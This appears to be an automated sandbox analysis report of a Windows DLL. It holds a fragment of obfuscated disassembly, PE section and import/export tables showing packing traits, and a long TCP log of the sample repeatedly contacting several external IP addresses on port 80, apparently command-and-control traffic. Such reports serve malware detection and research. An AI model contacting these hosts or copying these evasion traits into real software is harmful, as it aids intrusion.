shl dword ptr [esp+00h], 1Ah
mov ecx, dword ptr [eax]
mov edx, dword ptr [esp+18h]
lea eax, dword ptr [0D912A20h+edx*4]
mov dword ptr [esp+edx-6CF39CF1h], eax
mov eax, dword ptr [edi+edx-6CF39CDBh]
adc ecx, eax
movsx eax, word ptr [esp+edx-6CF39CDDh]
sub edx, eax
call 00007FF691ADC193h
dec eax
mov dword ptr [esp+edx-000054CDh], 00931ABFh
inc ecx
rol dl, 1
dec eax
xchg dword ptr [esp+08h], ebp
dec eax
add ebp, 0029843Ah
jmp ebp
dec ecx
xor ebp, ebx
dec esi
mov dword ptr [esp+ebx-5197AFB5h], esi
dec eax
adc esi, ecx
dec esp
lea edx, dword ptr [9A32CE25h+edi*2]
push ebp
inc ebx
mov ebx, dword ptr [edi+esi*2+095DD396h]
mul eax
dec eax
mov dword ptr [esp+ebp-51971F98h], 001EED02h
inc ebx
movzx edi, byte ptr [ebx+eax-5197AFBAh]
inc ecx
xor bh, ch
shr dl, 00000026h
je 00007FF6910DD5C8h
mov dword ptr [eax+eax+00h], edx

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x179a254	0x61	.rdata2
IMAGE_DIRECTORY_ENTRY_IMPORT	0xea9304	0x3c	.rdata2
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xd33600	0x4808	.rdata0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1bc4000	0x43c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x19145b4	0x18	.rdata2
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xe90000	0x10	.rdata1
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4ec4a8	0x0	d41d8cd98f00b204e9800998ecf8427e	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x4ee000	0x2cf6c	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x51b000	0x2ae2d4	0x0	d41d8cd98f00b204e9800998ecf8427e	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0x7ca000	0x36090	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0x801000	0x61	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.idata	0x802000	0x9c0	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x803000	0x2c	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x804000	0x8	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata0	0x805000	0x68a332	0x0	d41d8cd98f00b204e9800998ecf8427e	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata1	0xe90000	0x2c	0x200	0a91ad87cd345cc059e0ce3bc5667d43	False	0.04296875	data	0.14263576814887827	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata2	0xe91000	0xd32970	0xd32a00	74a53f560fcb613b34d713b8430dde26	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.reloc	0x1bc4000	0x43c	0x600	a8b5e214483e05d9e45a726c056304e5	False	0.4016927083333333	data	3.4674879728835952	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.dll	AddVectoredExceptionHandler
msvcrt.dll	__mb_cur_max

Exports

Name	Ordinal	Address
MainFunc	1	0x6c7a6460
_cgo_dummy_export	2	0x6cabf64c

Network Behavior

Download Network PCAP: filtered – full

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 15, 2024 12:42:22.397162914 CEST	49707	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:42:22.400919914 CEST	49708	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:42:22.402092934 CEST	80	49707	195.2.70.38	192.168.2.7
Jul 15, 2024 12:42:22.402172089 CEST	49707	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:42:22.405761957 CEST	80	49708	195.2.70.38	192.168.2.7
Jul 15, 2024 12:42:22.405827045 CEST	49708	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:42:22.409168005 CEST	49707	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:42:22.411345959 CEST	49708	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:42:22.414011002 CEST	80	49707	195.2.70.38	192.168.2.7
Jul 15, 2024 12:42:22.416160107 CEST	80	49708	195.2.70.38	192.168.2.7
Jul 15, 2024 12:42:24.137427092 CEST	80	49707	195.2.70.38	192.168.2.7
Jul 15, 2024 12:42:24.137499094 CEST	49707	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:42:24.137803078 CEST	49707	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:42:24.139049053 CEST	49709	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:42:24.139441013 CEST	80	49708	195.2.70.38	192.168.2.7
Jul 15, 2024 12:42:24.139508009 CEST	49708	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:42:24.139671087 CEST	49708	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:42:24.140830994 CEST	49710	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:42:24.142846107 CEST	80	49707	195.2.70.38	192.168.2.7
Jul 15, 2024 12:42:24.144296885 CEST	80	49709	91.142.74.28	192.168.2.7
Jul 15, 2024 12:42:24.144372940 CEST	49709	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:42:24.144915104 CEST	80	49708	195.2.70.38	192.168.2.7
Jul 15, 2024 12:42:24.145646095 CEST	49709	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:42:24.145776987 CEST	80	49710	91.142.74.28	192.168.2.7
Jul 15, 2024 12:42:24.145849943 CEST	49710	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:42:24.147154093 CEST	49710	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:42:24.150480032 CEST	80	49709	91.142.74.28	192.168.2.7
Jul 15, 2024 12:42:24.151958942 CEST	80	49710	91.142.74.28	192.168.2.7
Jul 15, 2024 12:42:25.905185938 CEST	80	49710	91.142.74.28	192.168.2.7
Jul 15, 2024 12:42:25.905395031 CEST	49710	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:42:25.905535936 CEST	49710	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:42:25.905704975 CEST	80	49709	91.142.74.28	192.168.2.7
Jul 15, 2024 12:42:25.906507015 CEST	49709	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:42:25.906830072 CEST	49709	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:42:25.906830072 CEST	49711	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:42:25.908540964 CEST	49712	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:42:25.910375118 CEST	80	49710	91.142.74.28	192.168.2.7
Jul 15, 2024 12:42:25.911777020 CEST	80	49709	91.142.74.28	192.168.2.7
Jul 15, 2024 12:42:25.911792040 CEST	80	49711	77.238.224.56	192.168.2.7
Jul 15, 2024 12:42:25.912029028 CEST	49711	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:42:25.912389994 CEST	49711	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:42:25.913362026 CEST	80	49712	77.238.224.56	192.168.2.7
Jul 15, 2024 12:42:25.913952112 CEST	49712	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:42:25.916162968 CEST	49712	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:42:25.917593002 CEST	80	49711	77.238.224.56	192.168.2.7
Jul 15, 2024 12:42:25.921091080 CEST	80	49712	77.238.224.56	192.168.2.7
Jul 15, 2024 12:42:27.521117926 CEST	80	49712	77.238.224.56	192.168.2.7
Jul 15, 2024 12:42:27.521285057 CEST	49712	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:42:27.521418095 CEST	49712	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:42:27.522398949 CEST	49713	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:42:27.527606010 CEST	80	49712	77.238.224.56	192.168.2.7
Jul 15, 2024 12:42:27.527638912 CEST	80	49713	77.238.229.63	192.168.2.7
Jul 15, 2024 12:42:27.527712107 CEST	49713	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:42:27.529103994 CEST	49713	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:42:27.534698009 CEST	80	49711	77.238.224.56	192.168.2.7
Jul 15, 2024 12:42:27.534769058 CEST	49711	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:42:27.534879923 CEST	49711	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:42:27.535410881 CEST	80	49713	77.238.229.63	192.168.2.7
Jul 15, 2024 12:42:27.535741091 CEST	49714	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:42:27.539829016 CEST	80	49711	77.238.224.56	192.168.2.7
Jul 15, 2024 12:42:27.540580988 CEST	80	49714	77.238.229.63	192.168.2.7
Jul 15, 2024 12:42:27.540762901 CEST	49714	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:42:27.541142941 CEST	49714	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:42:27.546278000 CEST	80	49714	77.238.229.63	192.168.2.7
Jul 15, 2024 12:42:29.162482977 CEST	80	49713	77.238.229.63	192.168.2.7
Jul 15, 2024 12:42:29.162573099 CEST	49713	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:42:29.168417931 CEST	49713	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:42:29.173439026 CEST	80	49713	77.238.229.63	192.168.2.7
Jul 15, 2024 12:42:29.178045034 CEST	80	49714	77.238.229.63	192.168.2.7
Jul 15, 2024 12:42:29.178105116 CEST	49714	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:42:29.200242996 CEST	49714	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:42:29.205595970 CEST	80	49714	77.238.229.63	192.168.2.7
Jul 15, 2024 12:42:29.247524977 CEST	49715	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:42:29.252312899 CEST	80	49715	77.238.250.123	192.168.2.7
Jul 15, 2024 12:42:29.252388000 CEST	49715	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:42:29.280556917 CEST	49716	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:42:29.285346031 CEST	80	49716	77.238.250.123	192.168.2.7
Jul 15, 2024 12:42:29.285415888 CEST	49716	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:42:29.375309944 CEST	49715	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:42:29.380316973 CEST	80	49715	77.238.250.123	192.168.2.7
Jul 15, 2024 12:42:29.410412073 CEST	49716	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:42:29.427151918 CEST	80	49716	77.238.250.123	192.168.2.7
Jul 15, 2024 12:42:29.869740963 CEST	80	49715	77.238.250.123	192.168.2.7
Jul 15, 2024 12:42:29.890698910 CEST	80	49716	77.238.250.123	192.168.2.7
Jul 15, 2024 12:42:29.926670074 CEST	49715	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:42:29.989387989 CEST	49716	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:42:29.989396095 CEST	49715	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:42:29.994682074 CEST	80	49716	77.238.250.123	192.168.2.7
Jul 15, 2024 12:42:29.994750977 CEST	49716	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:42:29.995233059 CEST	80	49715	77.238.250.123	192.168.2.7
Jul 15, 2024 12:42:29.995281935 CEST	49715	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:42:31.433315992 CEST	49717	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:42:31.438210964 CEST	80	49717	195.2.70.38	192.168.2.7
Jul 15, 2024 12:42:31.438278913 CEST	49717	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:42:31.439702034 CEST	49717	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:42:31.446809053 CEST	80	49717	195.2.70.38	192.168.2.7
Jul 15, 2024 12:42:33.189800978 CEST	80	49717	195.2.70.38	192.168.2.7
Jul 15, 2024 12:42:33.189857960 CEST	49717	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:42:33.189999104 CEST	49717	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:42:33.194875956 CEST	80	49717	195.2.70.38	192.168.2.7
Jul 15, 2024 12:42:33.198348999 CEST	49722	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:42:33.203377962 CEST	80	49722	91.142.74.28	192.168.2.7
Jul 15, 2024 12:42:33.203483105 CEST	49722	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:42:33.204940081 CEST	49722	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:42:33.211478949 CEST	80	49722	91.142.74.28	192.168.2.7
Jul 15, 2024 12:42:34.935306072 CEST	80	49722	91.142.74.28	192.168.2.7
Jul 15, 2024 12:42:34.935379028 CEST	49722	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:42:34.935456038 CEST	49722	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:42:34.936326027 CEST	49724	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:42:34.940238953 CEST	80	49722	91.142.74.28	192.168.2.7
Jul 15, 2024 12:42:34.941768885 CEST	80	49724	77.238.224.56	192.168.2.7
Jul 15, 2024 12:42:34.941850901 CEST	49724	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:42:34.942739964 CEST	49724	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:42:34.947819948 CEST	80	49724	77.238.224.56	192.168.2.7
Jul 15, 2024 12:42:36.603238106 CEST	80	49724	77.238.224.56	192.168.2.7
Jul 15, 2024 12:42:36.603336096 CEST	49724	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:42:36.603429079 CEST	49724	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:42:36.604443073 CEST	49725	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:42:36.608356953 CEST	80	49724	77.238.224.56	192.168.2.7
Jul 15, 2024 12:42:36.611347914 CEST	80	49725	77.238.229.63	192.168.2.7
Jul 15, 2024 12:42:36.611418009 CEST	49725	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:42:36.612364054 CEST	49725	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:42:36.617232084 CEST	80	49725	77.238.229.63	192.168.2.7
Jul 15, 2024 12:42:38.204090118 CEST	80	49725	77.238.229.63	192.168.2.7
Jul 15, 2024 12:42:38.204221964 CEST	49725	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:42:38.204314947 CEST	49725	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:42:38.205161095 CEST	49726	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:42:38.209141970 CEST	80	49725	77.238.229.63	192.168.2.7
Jul 15, 2024 12:42:38.211074114 CEST	80	49726	77.238.250.123	192.168.2.7
Jul 15, 2024 12:42:38.211162090 CEST	49726	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:42:38.211824894 CEST	49726	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:42:38.219041109 CEST	80	49726	77.238.250.123	192.168.2.7
Jul 15, 2024 12:42:38.815567017 CEST	80	49726	77.238.250.123	192.168.2.7
Jul 15, 2024 12:42:38.816045046 CEST	49726	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:42:38.821315050 CEST	80	49726	77.238.250.123	192.168.2.7
Jul 15, 2024 12:42:38.821403980 CEST	49726	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:43:00.038743973 CEST	54485	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:43:00.038858891 CEST	54484	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:43:00.043992996 CEST	80	54485	195.2.70.38	192.168.2.7
Jul 15, 2024 12:43:00.044008017 CEST	80	54484	195.2.70.38	192.168.2.7
Jul 15, 2024 12:43:00.044074059 CEST	54485	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:43:00.044178009 CEST	54484	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:43:00.044554949 CEST	54484	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:43:00.044605970 CEST	54485	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:43:00.049590111 CEST	80	54484	195.2.70.38	192.168.2.7
Jul 15, 2024 12:43:00.049599886 CEST	80	54485	195.2.70.38	192.168.2.7
Jul 15, 2024 12:43:02.587536097 CEST	80	54485	195.2.70.38	192.168.2.7
Jul 15, 2024 12:43:02.587588072 CEST	80	54484	195.2.70.38	192.168.2.7
Jul 15, 2024 12:43:02.587642908 CEST	54485	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:43:02.587666988 CEST	54484	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:43:02.587757111 CEST	54485	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:43:02.587773085 CEST	54484	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:43:02.588495016 CEST	80	54485	195.2.70.38	192.168.2.7
Jul 15, 2024 12:43:02.588516951 CEST	80	54484	195.2.70.38	192.168.2.7
Jul 15, 2024 12:43:02.588624954 CEST	54485	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:43:02.588825941 CEST	54484	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:43:02.588829994 CEST	54486	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:43:02.589068890 CEST	80	54485	195.2.70.38	192.168.2.7
Jul 15, 2024 12:43:02.589086056 CEST	80	54484	195.2.70.38	192.168.2.7
Jul 15, 2024 12:43:02.589096069 CEST	54487	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:43:02.589126110 CEST	54485	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:43:02.589180946 CEST	54484	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:43:02.593738079 CEST	80	54485	195.2.70.38	192.168.2.7
Jul 15, 2024 12:43:02.593748093 CEST	80	54484	195.2.70.38	192.168.2.7
Jul 15, 2024 12:43:02.594321012 CEST	80	54486	91.142.74.28	192.168.2.7
Jul 15, 2024 12:43:02.594413042 CEST	54486	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:43:02.594436884 CEST	80	54487	91.142.74.28	192.168.2.7
Jul 15, 2024 12:43:02.594542027 CEST	54487	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:43:02.594851017 CEST	54486	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:43:02.594928980 CEST	54487	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:43:02.599986076 CEST	80	54486	91.142.74.28	192.168.2.7
Jul 15, 2024 12:43:02.600002050 CEST	80	54487	91.142.74.28	192.168.2.7
Jul 15, 2024 12:43:04.326922894 CEST	80	54486	91.142.74.28	192.168.2.7
Jul 15, 2024 12:43:04.327056885 CEST	54486	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:43:04.327128887 CEST	80	54487	91.142.74.28	192.168.2.7
Jul 15, 2024 12:43:04.327333927 CEST	54487	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:43:04.327333927 CEST	54487	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:43:04.327579021 CEST	54486	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:43:04.328227043 CEST	54488	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:43:04.328444958 CEST	54489	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:43:04.332115889 CEST	80	54487	91.142.74.28	192.168.2.7
Jul 15, 2024 12:43:04.332469940 CEST	80	54486	91.142.74.28	192.168.2.7
Jul 15, 2024 12:43:04.333861113 CEST	80	54488	77.238.224.56	192.168.2.7
Jul 15, 2024 12:43:04.333870888 CEST	80	54489	77.238.224.56	192.168.2.7
Jul 15, 2024 12:43:04.333950043 CEST	54488	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:43:04.334141016 CEST	54489	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:43:04.334289074 CEST	54489	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:43:04.334315062 CEST	54488	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:43:04.339046001 CEST	80	54489	77.238.224.56	192.168.2.7
Jul 15, 2024 12:43:04.339167118 CEST	80	54488	77.238.224.56	192.168.2.7
Jul 15, 2024 12:43:05.921228886 CEST	80	54488	77.238.224.56	192.168.2.7
Jul 15, 2024 12:43:05.921314001 CEST	54488	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:43:05.921448946 CEST	54488	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:43:05.922385931 CEST	54490	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:43:05.926158905 CEST	80	54488	77.238.224.56	192.168.2.7
Jul 15, 2024 12:43:05.927194118 CEST	80	54490	77.238.229.63	192.168.2.7
Jul 15, 2024 12:43:05.927263975 CEST	54490	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:43:05.927489042 CEST	54490	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:43:05.932193041 CEST	80	54490	77.238.229.63	192.168.2.7
Jul 15, 2024 12:43:05.938227892 CEST	80	54489	77.238.224.56	192.168.2.7
Jul 15, 2024 12:43:05.938319921 CEST	54489	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:43:05.938550949 CEST	54489	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:43:05.939558029 CEST	54491	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:43:05.943413019 CEST	80	54489	77.238.224.56	192.168.2.7
Jul 15, 2024 12:43:05.944350004 CEST	80	54491	77.238.229.63	192.168.2.7
Jul 15, 2024 12:43:05.944422007 CEST	54491	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:43:05.944766998 CEST	54491	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:43:05.949485064 CEST	80	54491	77.238.229.63	192.168.2.7
Jul 15, 2024 12:43:07.533894062 CEST	80	54490	77.238.229.63	192.168.2.7
Jul 15, 2024 12:43:07.533977032 CEST	54490	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:43:07.534077883 CEST	54490	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:43:07.535670996 CEST	54492	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:43:07.538784981 CEST	80	54490	77.238.229.63	192.168.2.7
Jul 15, 2024 12:43:07.540426970 CEST	80	54492	77.238.250.123	192.168.2.7
Jul 15, 2024 12:43:07.540494919 CEST	54492	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:43:07.540815115 CEST	54492	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:43:07.545810938 CEST	80	54492	77.238.250.123	192.168.2.7
Jul 15, 2024 12:43:07.586747885 CEST	80	54491	77.238.229.63	192.168.2.7
Jul 15, 2024 12:43:07.586816072 CEST	54491	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:43:07.586903095 CEST	54491	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:43:07.588077068 CEST	54493	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:43:07.591686964 CEST	80	54491	77.238.229.63	192.168.2.7
Jul 15, 2024 12:43:07.593101978 CEST	80	54493	77.238.250.123	192.168.2.7
Jul 15, 2024 12:43:07.593389034 CEST	54493	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:43:07.593914986 CEST	54493	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:43:07.598763943 CEST	80	54493	77.238.250.123	192.168.2.7
Jul 15, 2024 12:43:08.149643898 CEST	80	54492	77.238.250.123	192.168.2.7
Jul 15, 2024 12:43:08.150461912 CEST	54492	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:43:08.155570984 CEST	80	54492	77.238.250.123	192.168.2.7
Jul 15, 2024 12:43:08.158298969 CEST	54492	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:43:08.192524910 CEST	80	54493	77.238.250.123	192.168.2.7
Jul 15, 2024 12:43:08.192795038 CEST	54493	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:43:08.198010921 CEST	80	54493	77.238.250.123	192.168.2.7
Jul 15, 2024 12:43:08.198263884 CEST	54493	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:43:08.819787979 CEST	54494	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:43:08.824609995 CEST	80	54494	195.2.70.38	192.168.2.7
Jul 15, 2024 12:43:08.824696064 CEST	54494	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:43:08.824940920 CEST	54494	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:43:08.829677105 CEST	80	54494	195.2.70.38	192.168.2.7
Jul 15, 2024 12:43:10.580302000 CEST	80	54494	195.2.70.38	192.168.2.7
Jul 15, 2024 12:43:10.580447912 CEST	54494	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:43:10.580537081 CEST	54494	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:43:10.581475973 CEST	54495	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:43:10.586422920 CEST	80	54494	195.2.70.38	192.168.2.7
Jul 15, 2024 12:43:10.586436987 CEST	80	54495	91.142.74.28	192.168.2.7
Jul 15, 2024 12:43:10.586527109 CEST	54495	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:43:10.586793900 CEST	54495	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:43:10.591728926 CEST	80	54495	91.142.74.28	192.168.2.7
Jul 15, 2024 12:43:12.328131914 CEST	80	54495	91.142.74.28	192.168.2.7
Jul 15, 2024 12:43:12.328200102 CEST	54495	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:43:12.328306913 CEST	54495	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:43:12.329272032 CEST	54496	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:43:12.333014011 CEST	80	54495	91.142.74.28	192.168.2.7
Jul 15, 2024 12:43:12.334059954 CEST	80	54496	77.238.224.56	192.168.2.7
Jul 15, 2024 12:43:12.334134102 CEST	54496	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:43:12.334419966 CEST	54496	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:43:12.339560986 CEST	80	54496	77.238.224.56	192.168.2.7
Jul 15, 2024 12:43:13.977777004 CEST	80	54496	77.238.224.56	192.168.2.7
Jul 15, 2024 12:43:13.977893114 CEST	54496	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:43:13.978094101 CEST	54496	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:43:13.979091883 CEST	54497	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:43:13.982903004 CEST	80	54496	77.238.224.56	192.168.2.7
Jul 15, 2024 12:43:13.983990908 CEST	80	54497	77.238.229.63	192.168.2.7
Jul 15, 2024 12:43:13.984121084 CEST	54497	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:43:13.984504938 CEST	54497	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:43:13.989377975 CEST	80	54497	77.238.229.63	192.168.2.7
Jul 15, 2024 12:43:15.629895926 CEST	80	54497	77.238.229.63	192.168.2.7
Jul 15, 2024 12:43:15.630016088 CEST	54497	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:43:15.630150080 CEST	54497	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:43:15.631088972 CEST	54498	80	192.168.2.7	77.238.250.123
